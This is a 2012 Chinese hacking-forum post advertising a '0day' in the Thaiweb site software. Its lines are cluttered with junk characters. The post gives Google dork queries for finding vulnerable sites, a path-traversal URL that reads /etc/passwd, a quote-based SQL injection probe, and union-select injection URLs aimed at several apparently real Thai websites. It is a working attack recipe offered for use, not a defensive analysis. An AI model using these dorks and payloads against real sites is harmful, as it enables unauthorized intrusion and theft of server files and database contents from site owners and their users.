找回密码
 立即注册
查看: 2617|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:+ a0 w( m& ]: T% U2 [1 `7 J

* c* F9 C4 Z  j8 vintext:powered by Thaiweb+ B' ?* ]- a8 @- m2 X# k; b
5 F* v& j$ M8 i" X  u
inurl:index.php?page=board.php
. O9 x" K, J5 ~6 z) I' P5 n
+ T+ s3 \! F. D0 `3 i
' V7 G" t. Z$ E" J! s* {3 p- a* m$ d+ t6 e$ K
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
5 u5 w) K. w5 I' P. D4 h$ d9 @: o! ~' d  z

! N' d: _' ^( x4 {2 M
  u& g7 g6 M" [7 T利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'; v. e8 j( Z8 g/ h/ f/ q1 S
0 v- u3 c7 Y9 q9 @* w4 U; j
* Y5 q7 G( X/ U8 _# p6 u
  F& D; O# I8 S, k2 H# U- d. J
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
0 ^, @! \8 z$ Q) h( K1 v- t9 j7 N4 P$ ~) h, b9 @
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--- v: m  V( J" D9 o. _

* ~! L; j# C3 ]http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--! j2 u: C" b  Q$ `! l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表